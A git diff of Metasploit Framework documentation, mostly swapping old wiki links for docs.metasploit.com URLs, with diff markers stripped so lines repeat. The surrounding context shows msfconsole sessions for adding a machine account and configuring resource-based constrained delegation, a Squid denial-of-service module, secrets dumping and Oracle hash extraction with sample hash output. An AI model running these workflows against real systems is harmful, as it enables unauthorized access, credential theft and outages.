This list isn't intended to be exhaustive - it's simply the bare minimum set of details we need to reproduce and diagnose your bug. You should feel free to include as much detailed information as you need to help us understand how you got the results you did.
This list isn't intended to be exhaustive - it's simply the bare minimum set of details we need to reproduce and diagnose your bug. You should feel free to include as much detailed information as you need to help us understand how you got the results you did.
## Avoid Duplicates
You may not be the first person to notice the problem you're seeing as a Framework user, and the more bug reports we get, the more difficult it is to sort through them all for easy fixes or high-priority issues. Here are some ways to help a previously-reported bug get noticed more quickly and prioritized (if necessary).
* Having a problem with a module? Try [searching that module's name](https://github.com/rapid7/metasploit-framework/issues?q=is%3Aissue+is%3Aopen+psexec) to see if anyone else has reported (or fixed!) your problem recently.
* Having a problem with a module? Try [searching that module's name](https://github.com/rapid7/metasploit-framework/issues?q=is%3Aissue+is%3Aopen+psexec) to see if anyone else has reported (or fixed!) your problem recently.
* Getting a strange error and not sure what it means? [Search for the error](https://github.com/rapid7/metasploit-framework/issues?q=is%3Aissue+URI.unescape) to see if others have had or addressed the same problem you are facing.
* Pro tip: Search both [open and closed issues](https://github.com/rapid7/metasploit-framework/issues?q=is%3Aissue) to see if what you're reporting was resolved (in which case you might simply need to update to a later version of Metasploit) or if there's a workaround someone else has discovered that might help you while we get to your issue.
* If you DO discover that someone else has already reported the issue you're experiencing, please do update that issue with any new information - for instance, that you're experiencing the issue on a different OS or in a different version of Metasploit than what the original issue reports described.
* If you DO discover that someone else has already reported the issue you're experiencing, please do update that issue with any new information - for instance, that you're experiencing the issue on a different OS or in a different version of Metasploit than what the original issue reports described.
* If you find closed issues or resolved bugs that describe a problem you're having on a later version of Metasploit, that could indicate a regression (old bugs that have been reintroduced). It helps us if you note this in your issue report. Fixes for regressions can be fast, so making note of possible regressions is useful.
* Finally, you might find a bug that's been rejected or closed without resolution. In many of these cases, the problem is something external to Metasploit: user error, configuration issues, known incompatibilities, etc. If you think that the original resolution was in error or incomplete, open a **new** issue report and refer to any related issue reports.
* Finally, you might find a bug that's been rejected or closed without resolution. In many of these cases, the problem is something external to Metasploit: user error, configuration issues, known incompatibilities, etc. If you think that the original resolution was in error or incomplete, open a **new** issue report and refer to any related issue reports.
## Other Notes
* Networking is hard, as we've often said even among ourselves! You might want to see if your network configuration is unusual in any way, or do a regular old internet search to check whether your config might be the problem.
@ -73,10 +73,10 @@ You may not be the first person to notice the problem you're seeing as a Framewo
If you're a superhero and you figured out the root cause of a bug AND found a way to fix it, you can send your Metasploit fixes and improvements our way! The best way to get your fix into Metasploit quickly is to patch your own fork and submit a pull request to Metasploit. You get extra gratitude from all of us when you do this, and you'll also get a shout-out in the [weekly Metasploit wrap-up](https://blog.rapid7.com/tag/metasploit-weekly-wrapup/).
You can find a guide on setting up your own [Metasploit Development Environment here](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment).
You can find a guide on setting up your own [Metasploit Development Environment here](https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html).
## Public Discussion
Some projects and companies don't like discussing bugs in the bug report itself. Some even have policies of not doing this. Metasploit is not one of those projects. We greatly prefer public communication over private communication because it makes community knowledge accessible and searchable to everyone. That said, if you have specific privacy or security concerns, we're always happy to speak privately. You can get in touch with us at msfdev@metasploit.com.
Some projects and companies don't like discussing bugs in the bug report itself. Some even have policies of not doing this. Metasploit is not one of those projects. We greatly prefer public communication over private communication because it makes community knowledge accessible and searchable to everyone. That said, if you have specific privacy or security concerns, we're always happy to speak privately. You can get in touch with us at msfdev@metasploit.com.
## Resolved Bugs
Your bug should be considered "Resolved" once there's a fix landed in the [Metasploit-Framework master branch](https://github.com/rapid7/metasploit-framework). People who track that branch will have the fix available quickly. It may take other distributions that include Metasploit (e.g., Kali) a few days to pull in fixes, depending on their individual release cadences.

2
docs/metasploit-framework.wiki/Rolling-back-merges.md
View File

@ -10,7 +10,7 @@ clone, and all gems have to be reinstalled every time. Also, some rspec tests re
network connections to assets on the Internet. Sometimes, GitHub Actions servers are under a lot of
load, and builds time out.
The best way to diagnose these problems is simply to restart the build. Note, only [Committers](https://github.com/rapid7/metasploit-framework/wiki/Committer-Rights) have rights to do this. If that doesn't clear things up, or if it's obvious that there are real failures (since you've read the rspec results and have read the tests), the first order of business is to undo your bad commit.
The best way to diagnose these problems is simply to restart the build. Note, only [Committers](https://docs.metasploit.com/docs/development/maintainers/committer-rights.html) have rights to do this. If that doesn't clear things up, or if it's obvious that there are real failures (since you've read the rspec results and have read the tests), the first order of business is to undo your bad commit.
**Note**: in branches other than `master`, you can usually just fix things normally with new commits. There are plenty of "whoops" commit messages in our history.

12
docs/metasploit-framework.wiki/Running-Private-Modules.md
View File

@ -40,7 +40,7 @@ If you already have msfconsole running, use a `reload_all` command to pick up yo
mkdir -p $HOME/.msf4/modules/exploits/test
curl -Lo ~/.msf4/modules/exploits/test/test_module.rb https://gist.github.com/todb-r7/5935519/raw/17f7e40ab9054051c1f7e0655c6f8c8a1787d4f5/test_module.rb
todb@ubuntu:~$ mkdir -p $HOME/.msf4/modules/exploits/test
todb@ubuntu:~$ curl -Lo ~/.msf4/modules/exploits/test/test_module.rb https://gist.github.com/todb-r7/5935519/raw/6e5d2da61c82b0aa8cec36825363118e9dd5f86b/test_module.rb
todb@ubuntu:~$ curl -Lo ~/.msf4/modules/exploits/test/test_module.rb https://gist.github.com/todb-r7/5935519/raw/6e5d2da61c82b0aa8cec36825363118e9dd5f86b/test_module.rb
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1140 0 1140 0 0 3607 0 --:--:-- --:--:-- --:--:-- 7808
@ -65,7 +65,7 @@ I love shells --egypt
+ -- --=[ 1122 exploits - 707 auxiliary - 192 post
+ -- --=[ 307 payloads - 30 encoders - 8 nops
msf > use exploit/test/test_module
msf > use exploit/test/test_module
msf exploit(test_module) > info
Name: Fake Test Module
@ -99,9 +99,9 @@ References:
msf exploit(test_module) > exploit
[*] Started reverse handler on 192.168.145.1:4444
[*] Started reverse handler on 192.168.145.1:4444
[+] Hello, world!
msf exploit(test_module) >
msf exploit(test_module) >
```
## Troubleshooting
@ -116,7 +116,7 @@ That's really all there is to it. The most common problems that people (includin
Note that the `$HOME` directory for Metasploit Community Edition is going to be `root` and not your own user directory, so if you are expecting modules to show up in the Metasploit Pro web UIs, you will want to stash your external modules in `/root/.msf4/modules`. Of course, this means you need root access to the machine in question, but hey, you're a l33t Metasploit user, so that shouldn't be too hard.
Also note that if your modules are not displaying in the web UI, you should restart Pro service.
Also note that if your modules are not displaying in the web UI, you should restart Pro service.
### Windows
@ -126,7 +126,7 @@ For Windows users, the above is all true, except for accessing the modules from
Any module that requires on changes to core library functions, such as new protocol parsers or other library mixins, aren't going to work out for you this way -- you're going to end up spewing errors all over the place as your module tries to load these classes. It's possible to write modules as completely self-contained in nearly all cases (thanks to Ruby's open class architecture), but such modules nearly always get refactored later to make the protocol and other mixin bits available to other modules.
In this case, it would be better to work with modules like that using a proper GitHub checkout with a development branch -- see the [dev environment setup docs](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment) for tons more on that.
In this case, it would be better to work with modules like that using a proper GitHub checkout with a development branch -- see the [dev environment setup docs](https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html) for tons more on that.
## A final warning

2
docs/metasploit-framework.wiki/The-ins-and-outs-of-HTTP-and-HTTPS-communications-in-Meterpreter-and-Metasploit-Stagers.md
View File

@ -61,5 +61,5 @@ HTTP/S communications in Windows is a hairy beast, and trying to cater for all c
[WinInet]: https://msdn.microsoft.com/en-us/library/windows/desktop/aa383630%28v=vs.85%29.aspx
[WinHTTP]: https://msdn.microsoft.com/en-us/library/windows/desktop/aa382925%28v=vs.85%29.aspx
[winhttp_wininet]: https://msdn.microsoft.com/en-us/library/windows/desktop/hh227298%28v=vs.85%29.aspx
[Paranoid Mode]: https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Paranoid-Mode
[Paranoid Mode]: https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-paranoid-mode.html
[OJ]: https://github.com/OJ

2
docs/metasploit-framework.wiki/Using-local-gems.md
View File

@ -2,7 +2,7 @@
Often times when testing Gem file updates, particularly from other repositories such as [rex-powershell](https://github.com/rapid7/rex-powershell) or [rex-text](https://github.com/rapid7/rex-text), one will need to find some way of testing whether the updated Gem file works as expected within Metasploit Framework. There are many different ways to do this, however this guide will only focus on one method for simplicities sake, as this is the one that has been known to work with the least amount of prerequisite setup.
## Instructions
1. Set up a working Metasploit development setup as described at the [Setting Up a Development Environment](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment) wiki page. Be sure to set up your SSH keys as part of this setup.
1. Set up a working Metasploit development setup as described at the [Setting Up a Development Environment](https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html) wiki page. Be sure to set up your SSH keys as part of this setup.
2. Clone whatever PR it is that you wish to work on. For example to work on <https://github.com/rapid7/rex-text/pull/30>, do `git clone git@github.com:rapid7/rex-text.git`, then `cd rex-text`, followed by `git checkout origin/pr/30`.
3. Go to the location of your git clone of Metasploit Framework and do `cp Gemfile.local.example Gemfile.local`. Ensure that no file named `Gemfile.local.lock` exists. If one does, remove it.
4. Inside your `Gemfile.local` file, edit it so it looks something like the following:

2
docs/metasploit-framework.wiki/Writing-External-Python-Modules.md
View File

@ -62,7 +62,7 @@ single_scanner
multi_scanner
```
The `remote_exploit_cmd_stager` module type is used when writing an exploit for command execution or code injection vulnerabilities and provides the command to inject into the vulnerable code based on the [flavor](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-command-stagers) specified for the command stager.
The `remote_exploit_cmd_stager` module type is used when writing an exploit for command execution or code injection vulnerabilities and provides the command to inject into the vulnerable code based on the [flavor](https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-use-command-stagers.html) specified for the command stager.
The `capture_server` module type is used when a module is designed to simulate a service to capture credentials for connecting clients.

10
docs/metasploit-framework.wiki/dev/Setting-Up-a-Metasploit-Development-Environment.md
View File

@ -102,7 +102,7 @@ Regardless of your choice, you'll want to make sure that, when inside the `~/git
```
$ cd ~/git/metasploit-framework
$ cat .ruby-version
$ cat .ruby-version
3.0.2
$ ruby -v
ruby 3.0.2p107 (2021-07-07 revision 0db68f0233) [x86_64-linux]
@ -209,7 +209,7 @@ rake spec
```
You should see over 9000 tests run, mostly resulting in green dots, a few in yellow stars, and no red errors.
# Great! Now what?
We're excited to see your upcoming contributions of new modules, documentation, and fixes! Check out our [wiki documentation][wiki-documentation] and, if you're looking for inspiration, keep an eye out for [newbie-friendly pull requests and issues][newbie-friendly-prs-issues]. Please [submit your new pull requests][howto-PR] and reach out to us on [Slack] for community help.
@ -217,7 +217,7 @@ We're excited to see your upcoming contributions of new modules, documentation,
Finally, we welcome your feedback on this guide, so feel free to reach out to us on [Slack] or open a [new issue]. For their significant contributions to this guide, we would like to thank [@kernelsmith], [@corelanc0d3r], and [@ffmike].
[commercial-installer]:http://metasploit.com/download
[open-source-installer]:https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers
[open-source-installer]:https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html
[kali-user-instructions]:https://docs.kali.org/general-use/starting-metasploit-framework-in-kali
[parrot-user-instructions]:https://parrotsec.org/docs/installation.html
[CONTRIBUTING.md]:https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md
@ -240,10 +240,10 @@ Finally, we welcome your feedback on this guide, so feel free to reach out to us
[find]:https://linux.die.net/man/1/find
[$PATH]:https://askubuntu.com/questions/109381/how-to-add-path-of-a-program-to-path-environment-variable
[msf-web-service]:https://github.com/rapid7/metasploit-framework/wiki/Metasploit-Web-Service
[msf-web-service]:https://docs.metasploit.com/docs/using-metasploit/advanced/metasploit-web-service.html
[git-horror]:https://mikegerwitz.com/papers/git-horror-story#trust-ensure
[signing-howto]:https://github.com/rapid7/metasploit-framework/wiki/Committer-Keys#signing-howto
[signing-howto]:https://docs.metasploit.com/docs/development/maintainers/committer-keys.html#signing-howto
[git aliases]:https://git-scm.com/book/en/v2/Git-Basics-Git-Aliases
[rspec]:https://www.rubyguides.com/2018/07/rspec-tutorial/

10
documentation/README.md
View File

@ -10,11 +10,11 @@ The best source of documentation on Metasploit development is
https://github.com/rapid7/metasploit-framework/wiki. There are many
treasures there, such as:
* [Evading Antivirus](https://github.com/rapid7/metasploit-framework/wiki/Evading-Anti-Virus)
* [How Payloads Work](https://github.com/rapid7/metasploit-framework/wiki/How-payloads-work)
* [How to use Datastore Options](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-datastore-options)
* [How to write browser exploits with BES](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-browser-exploit-using-BrowserExploitServer)
* [How to write a bruteforcer](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-Msf%3A%3AAuxiliary%3A%3AAuthBrute-to-write-a-bruteforcer)
* [Evading Antivirus](https://docs.metasploit.com/docs/using-metasploit/intermediate/evading-anti-virus.html)
* [How Payloads Work](https://docs.metasploit.com/docs/using-metasploit/basics/how-payloads-work.html)
* [How to use Datastore Options](https://docs.metasploit.com/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html)
* [How to write browser exploits with BES](https://docs.metasploit.com/docs/development/developing-modules/libraries/http/how-to-write-a-browser-exploit-using-browserexploitserver.html)
* [How to write a bruteforcer](https://docs.metasploit.com/docs/development/developing-modules/libraries/how-to-use-msf-auxiliary-authbrute-to-write-a-bruteforcer.html)
...and many, many more.

6
documentation/modules/auxiliary/admin/dcerpc/samr_computer.md
View File

@ -60,7 +60,7 @@ msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBUser aliddle
SMBUser => aliddle
msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBPass Password1
SMBPass => Password1
msf6 auxiliary(admin/dcerpc/samr_computer) > show options
msf6 auxiliary(admin/dcerpc/samr_computer) > show options
Module options (auxiliary/admin/dcerpc/samr_computer):
@ -68,7 +68,7 @@ Module options (auxiliary/admin/dcerpc/samr_computer):
---- --------------- -------- -----------
COMPUTER_NAME no The computer name
COMPUTER_PASSWORD no The password for the new computer
RHOSTS 192.168.159.96 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS 192.168.159.96 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The target port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass Password1 no The password for the specified username
@ -94,7 +94,7 @@ Credentials
host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
192.168.159.96 192.168.159.96 445/tcp (smb) DESKTOP-2X8F54QG$ MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY MSFLAB Password
192.168.159.96 192.168.159.96 445/tcp (smb) DESKTOP-2X8F54QG$ MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY MSFLAB Password
msf6 auxiliary(admin/dcerpc/samr_computer) >
```

8
documentation/modules/auxiliary/admin/ldap/rbcd.md
View File

@ -49,7 +49,7 @@ The new computer account can then impersonate any user, including domain adminis
with the Service for User (S4U) Kerberos extension.
```
msf6 auxiliary(admin/dcerpc/samr_computer) > show options
msf6 auxiliary(admin/dcerpc/samr_computer) > show options
Module options (auxiliary/admin/dcerpc/samr_computer):
@ -57,7 +57,7 @@ Module options (auxiliary/admin/dcerpc/samr_computer):
---- --------------- -------- -----------
COMPUTER_NAME no The computer name
COMPUTER_PASSWORD no The password for the new computer
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The target port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
@ -85,7 +85,7 @@ msf6 auxiliary(admin/dcerpc/samr_computer) > run
[+] 192.168.159.10:445 - Password: A2HPEkkQzdxQirylqIj7BxqwB7kuUMrT
[+] 192.168.159.10:445 - SID: S-1-5-21-3402587289-1488798532-3618296993-1655
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/samr_computer) > use auxiliary/admin/ldap/rbcd
msf6 auxiliary(admin/dcerpc/samr_computer) > use auxiliary/admin/ldap/rbcd
msf6 auxiliary(admin/ldap/rbcd) > set BIND_DN sandy@msflab.local
BIND_DN => sandy@msflab.local
msf6 auxiliary(admin/ldap/rbcd) > set BIND_PW Password1!
@ -121,5 +121,5 @@ msf6 auxiliary(admin/ldap/rbcd) > read
[*] Allowed accounts:
[*] DESKTOP-QLSTR9NW$ (S-1-5-21-3402587289-1488798532-3618296993-1655)
[*] Auxiliary module execution completed
msf6 auxiliary(admin/ldap/rbcd) >
msf6 auxiliary(admin/ldap/rbcd) >
```

2
documentation/modules/auxiliary/admin/smb/ms17_010_command.md
View File

@ -82,7 +82,7 @@ This approach is generally reliable, but has a high chance of getting caught by
**MOF Upload Target**
The [MOF](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-WbemExec-for-a-write-privilege-attack-on-Windows) target technically does not use psexec; it does not explicitly tell Windows to execute anything. All it does is upload two files: the payload (exe) in SYSTEM32 and a managed object
The [MOF](https://docs.metasploit.com/docs/development/developing-modules/libraries/how-to-use-wbemexec-for-a-write-privilege-attack-on-windows.html) target technically does not use psexec; it does not explicitly tell Windows to execute anything. All it does is upload two files: the payload (exe) in SYSTEM32 and a managed object
format file in SYSTEM32\wbem\mof\ directory. When Windows sees the MOF file in that directory, it automatically runs it. Once executed, the code inside the MOF file basically tells Windows to execute our payload in SYSTEM32, and you get a session.
Although it's a neat trick, Metasploit's MOF library only works against Windows XP and Windows Server 2003. And since it writes files to disk, there is also a high chance of getting

10
documentation/modules/auxiliary/dos/http/squid_range_dos.md
View File

@ -27,8 +27,8 @@ Security bulletin from Squid: https://github.com/squid-cache/squid/security/advi
### REQUEST_COUNT
REQUEST_COUNT is both the the number of HTTP requests which are sent to the server in
order to perform the actual Denial of Service (i.e. accepted requests by the server),
and the number of requests that are sent to confirm that the Squid host is actually
order to perform the actual Denial of Service (i.e. accepted requests by the server),
and the number of requests that are sent to confirm that the Squid host is actually
dead.
### CVE
@ -45,7 +45,7 @@ msf6 auxiliary(dos/http/squid_range_dos) > set RHOSTS 192.168.159.128
RHOSTS => 192.168.159.128
msf6 auxiliary(dos/http/squid_range_dos) > set SRVHOST 192.168.159.128
SRVHOST => 192.168.159.128
msf6 auxiliary(dos/http/squid_range_dos) > show options
msf6 auxiliary(dos/http/squid_range_dos) > show options
Module options (auxiliary/dos/http/squid_range_dos):
@ -54,7 +54,7 @@ Module options (auxiliary/dos/http/squid_range_dos):
CVE CVE-2021-31806 yes CVE to check/exploit (Accepted: CVE-2021-31806, CVE-2021-31807)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
REQUEST_COUNT 50 yes The number of requests to be sent, as well as the number of re-tries to confirm a dead host
RHOSTS 192.168.159.128 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS 192.168.159.128 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 3128 yes The target port (TCP)
SRVHOST 192.168.159.128 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
@ -88,5 +88,5 @@ msf6 auxiliary(dos/http/squid_range_dos) > run
msf6 auxiliary(dos/http/squid_range_dos) >
```
At this point, the target Squid server should be completely inaccessible: all children
At this point, the target Squid server should be completely inaccessible: all children
workers should have exited, and the main process should have also shut down.

2
documentation/modules/auxiliary/gather/cisco_pvc2300_download_config.md
View File

@ -36,7 +36,7 @@ Module options (auxiliary/gather/cisco_pvc_2300_info_disclosure):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 172.31.31.233 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS 172.31.31.233 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host

2
documentation/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.md
View File

@ -82,7 +82,7 @@ Module options (auxiliary/gather/hikvision_info_disclosure_cve_2017_7921):
---- --------------- -------- -----------
PRINT true no Print output to console (not applicable for snapshot)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.100.180 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS 192.168.100.180 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host

6
documentation/modules/auxiliary/gather/manageengine_adaudit_plus_xnode_enum.md
View File

@ -87,7 +87,7 @@ Module options (auxiliary/gather/manageengine_adaudit_plus_xnode_enum):
ine_xnode/CVE-2020-11532/adaudit_plus_xnode_conf.yaml
DUMP_ALL false no Dump all data from the available data repositories (tables). If true, CONFIG_FILE will be ignored.
PASSWORD chegan yes Password used to authenticate to the Xnode server
RHOSTS 192.168.1.41 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS 192.168.1.41 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 29118 yes The target port (TCP)
USERNAME atom yes Username used to authenticate to the Xnode server
@ -115,7 +115,7 @@ msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > set rhosts 192.168
rhosts => 192.168.1.25
msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > set password custom_password
password => custom_password
msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > options
msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > options
Module options (auxiliary/gather/manageengine_adaudit_plus_xnode_enum):
@ -125,7 +125,7 @@ Module options (auxiliary/gather/manageengine_adaudit_plus_xnode_enum):
ode_conf.yaml
DUMP_ALL false no Dump all data from the available data repositories (tables). If true, CONFIG_FILE will be ignored.
PASSWORD custom_password yes Password used to authenticate to the Xnode server
RHOSTS 192.168.1.25 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS 192.168.1.25 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 29118 yes The target port (TCP)
USERNAME atom yes Username used to authenticate to the Xnode server

6
documentation/modules/auxiliary/gather/manageengine_datasecurity_plus_xnode_enum.md
View File

@ -1,7 +1,7 @@
## Vulnerable Application
The module exploits default admin credentials for the DataEngine Xnode server in DataSecurity Plus versions prior to 6.0.1 (6011)
in order to dump the contents of Xnode data repositories (tables), which may contain varying amounts of Active Directory information
including domain names, host names, usernames and SIDs. The module can also be used against patched
including domain names, host names, usernames and SIDs. The module can also be used against patched
DataSecurity Plus versions if the correct credentials are provided.
The module's `check` method attempts to authenticate to the remote Xnode server. The default credentials are `atom`:`chegan`.
@ -76,7 +76,7 @@ Dump all data from the available data repositories (tables). If true, CONFIG_FIL
## Scenarios
### ManageEngine DataSecurity Plus 6.0.1 (6010) on Windows Server 2012
```
msf6 auxiliary(gather/manageengine_datasecurity_plus_xnode_enum) > options
msf6 auxiliary(gather/manageengine_datasecurity_plus_xnode_enum) > options
Module options (auxiliary/gather/manageengine_datasecurity_plus_xnode_enum):
@ -86,7 +86,7 @@ Module options (auxiliary/gather/manageengine_datasecurity_plus_xnode_enum):
ine_xnode/CVE-2020-11532/datasecurity_plus_xnode_conf.yaml
DUMP_ALL false no Dump all data from the available data repositories (tables). If true, CONFIG_FILE will be ignored.
PASSWORD chegan yes Password used to authenticate to the Xnode server
RHOSTS 192.168.1.41 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS 192.168.1.41 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 29119 yes The target port (TCP)
USERNAME atom yes Username used to authenticate to the Xnode server

2
documentation/modules/auxiliary/gather/microweber_lfi.md
View File

@ -36,7 +36,7 @@ Module options (auxiliary/gather/microweber_lfi):
LOCAL_FILE_PATH yes The path of the local file.
PASSWORD yes The admin's password for Microweber
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path for Microweber

2
documentation/modules/auxiliary/gather/windows_secrets_dump.md
View File

@ -76,7 +76,7 @@ Module options (auxiliary/gather/windows_secrets_dump):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.100.123 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS 192.168.100.123 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The target port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass 123456 no The password for the specified username

2
documentation/modules/auxiliary/gather/wp_bookingpress_category_services_sqli.md
View File

@ -190,7 +190,7 @@ Module options (auxiliary/gather/wp_bookingpress_category_services_sqli):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 127.0.0.1 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS 127.0.0.1 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 8000 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /?page_id=10 yes The URL of the BookingPress appointment booking page

2
documentation/modules/auxiliary/scanner/http/syncovery_linux_login.md
View File

@ -58,7 +58,7 @@ Module options (auxiliary/scanner/http/syncovery_linux_login):
PASSWORD pass no The password to Syncovery (default: pass)
PASS_FILE no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.178.26 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS 192.168.178.26 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 8999 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
STOP_ON_SUCCESS true yes Stop guessing when a credential works for a host

2
documentation/modules/auxiliary/scanner/http/syncovery_linux_token_cve_2022_36536.md
View File

@ -56,7 +56,7 @@ Module options (auxiliary/scanner/http/syncovery_linux_token_cve_2022_36536):
---- --------------- -------- -----------
DAYS 1 yes Check today and last X day(s) for valid session token
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.178.26 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS 192.168.178.26 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 8999 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / no The path to Syncovery

10
documentation/modules/auxiliary/scanner/oracle/oracle_hashdump.md
View File

@ -11,21 +11,21 @@
```
C:> tnsping staticdb
...
Used TNSNAMES adapter to resolve the alias
Attempting to contact (DESCRIPTION = (ADDRESS = (PROTOCOL = TCP)(HOST = localhost)(PORT = 1521)) (CONNECT_DATA = (SERVER = DEDICATED) (SERVICE_NAME = staticdb)))
OK (0 msec)
```
If `tnsping` fails, make sure the listener is setup correctly.
See [this Oracle doc](https://docs.oracle.com/cd/E11882_01/network.112/e41945/listenercfg.htm#NETAG294) for more information about its configuration.
See [this Oracle doc](https://docs.oracle.com/cd/E11882_01/network.112/e41945/listenercfg.htm#NETAG294) for more information about its configuration.
4. Make sure to create a user on the DB that has a known password, and sufficient privileges to select any table. This is necessary for getting the hashes.
5. Test that the module's hash query works locally. Once your user is created with sufficient privileges, connect to the DB as the user, and proceed to run the following query
* 12c: `SELECT name, spare4 FROM sys.user$ where password is not null and name <> \'ANONYMOUS\'`
* pre-12c: `SELECT name, password FROM sys.user$ where password is not null and name<> \'ANONYMOUS\'`
6. Set up your MSF environment to support Oracle. You need gem ruby-oci8, as well as Oracle Instant Client.
[View the setup tutorial here](https://github.com/rapid7/metasploit-framework/wiki/How-to-get-Oracle-Support-working-with-Kali-Linux)
[View the setup tutorial here](https://docs.metasploit.com/docs/using-metasploit/other/oracle-support/how-to-get-oracle-support-working-with-kali-linux.html)
7. Make sure you have a database connected to MSF (postgresql). This can be done through `msfdb` tool or through `db_connect` command in `msfconsole`.
## Verification Steps
@ -81,7 +81,7 @@ msf5 auxiliary(scanner/oracle/oracle_hashdump) > run
...
SCOTT S:BF6D4E3791075A348BA76EF533E38F7211513CCE2A3513EE3E3D4A5A4DE0;H:3814C74599475EB73043A1211742EE59;T:0911BAC55EEF63F0C1769E816355BE29492C9D01980DC36C95A86C9CE47F93790631DE3D9A60C90451CFF152E25D9E94F612A1493EC82AF8E3C4D0432B06BA4C2C693B932332BC14D2D66CEF098A4699
...
[+] Hash Table has been saved
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
@ -90,7 +90,7 @@ Credentials
===========
host origin service public private realm private_type JtR Format
---- ------ ------- ------ -------
---- ------ ------- ------ -------
... ----- ------------ ----------
